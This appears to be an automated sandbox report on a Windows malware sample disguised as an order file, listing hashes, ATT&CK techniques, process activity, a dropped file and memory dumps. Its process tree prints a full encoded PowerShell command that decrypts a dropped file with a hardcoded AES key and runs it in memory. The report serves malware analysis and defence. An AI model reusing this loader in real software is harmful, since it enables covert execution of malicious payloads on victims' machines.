b38b57bd45b655389941d0730e86e6092b7e8b90d4362be15eba54ba8115e826

General

Target

order KHLN2024011801.exe
Size

945KB
MD5

05a11109178bfa121c9809eb376a7f05
SHA1

336c4c6e5ac8b4f5c7bf0078fd60591dc99c7eee
SHA256

b38b57bd45b655389941d0730e86e6092b7e8b90d4362be15eba54ba8115e826
SHA512

03317577d4015c8e8c96e46ee0d8efe185787c1f2ca450e040e54218b7168048fc72f1e73c4acbc0431bc662c144cf15d60209c710d0d2ac64c812dbf4cef94d
SSDEEP

12288:sthlOddH0IyXDvjhOLEl/1LvMj/2EcZt8kcAugZHY9gLg6bFScqo9RA1+scUMzrA:stbIyTFaWUcn8/AuM0oCRcjrjs

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
108	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
108	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	108	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2992 wrote to memory of 108	2992	order KHLN2024011801.exe	29
PID 2992 wrote to memory of 108	2992	order KHLN2024011801.exe	29
PID 2992 wrote to memory of 108	2992	order KHLN2024011801.exe	29

C:\Users\Admin\AppData\Local\Temp\order KHLN2024011801.exe
"C:\Users\Admin\AppData\Local\Temp\order KHLN2024011801.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA3AEIALAAgADAAeAAwAEUALAAgADAAeABFAEMALAAgADAAeAA3ADIALAAgADAAeAA4ADAALAAgADAAeABDADcALAAgADAAeABDAEUALAAgADAAeAAzAEEALAAgADAAeABCAEYALAAgADAAeABDAEIALAAgADAAeABEAEIALAAgADAAeAA4ADcALAAgADAAeAA3ADkALAAgADAAeAAxAEQALAAgADAAeABEADUALAAgADAAeAA4AEUALAAgADAAeABFADUALAAgADAAeAAzADkALAAgADAAeABBADMALAAgADAAeAA3ADAALAAgADAAeAAyAEEALAAgADAAeAA1AEQALAAgADAAeABFADEALAAgADAAeAAzAEEALAAgADAAeABDADUALAAgADAAeAA0ADUALAAgADAAeABGADYALAAgADAAeABCADcALAAgADAAeABGADEALAAgADAAeAA5ADYALAAgADAAeABGAEQALAAgADAAeAA3AEEAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEIARgAsACAAMAB4ADQARQAsACAAMAB4ADcANgAsACAAMAB4ADUAMAAsACAAMAB4ADAANQAsACAAMAB4ADMAOAAsACAAMAB4AEIAMgAsACAAMAB4ADQAQwAsACAAMAB4ADAARQAsACAAMAB4ADcANAAsACAAMAB4ADEAOQAsACAAMAB4ADkANgAsACAAMAB4ADMAQgAsACAAMAB4AEIAQQAsACAAMAB4ADIANQAsACAAMAB4AEMARgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\file-24869.putik

Filesize
21KB

MD5
f298985ee6fdf4468631bc50feae3817

SHA1
19b6d9f674d138d72b61458715747ccac04f2a3f

SHA256
8747c06c910c466e552c8c30bed77835282b92ba94c8d02841c0e5c6044dde00

SHA512
9c059453dd1308041cf35a267620e28236bb48c0dac5777d575b901a584730dac92576c934f88895727b23a26a523e39d77431d0ef2a554d1cd3fd5e6c10d51f

Download Submit
memory/108-5-0x000007FEF5D7E000-0x000007FEF5D7F000-memory.dmp

Filesize
4KB

Download
memory/108-6-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

Filesize
2.9MB

Download
memory/108-8-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/108-7-0x0000000000300000-0x0000000000308000-memory.dmp

Filesize
32KB

Download
memory/108-9-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/108-10-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/108-11-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/108-12-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/108-14-0x0000000002330000-0x000000000233A000-memory.dmp

Filesize
40KB

Download
memory/108-15-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing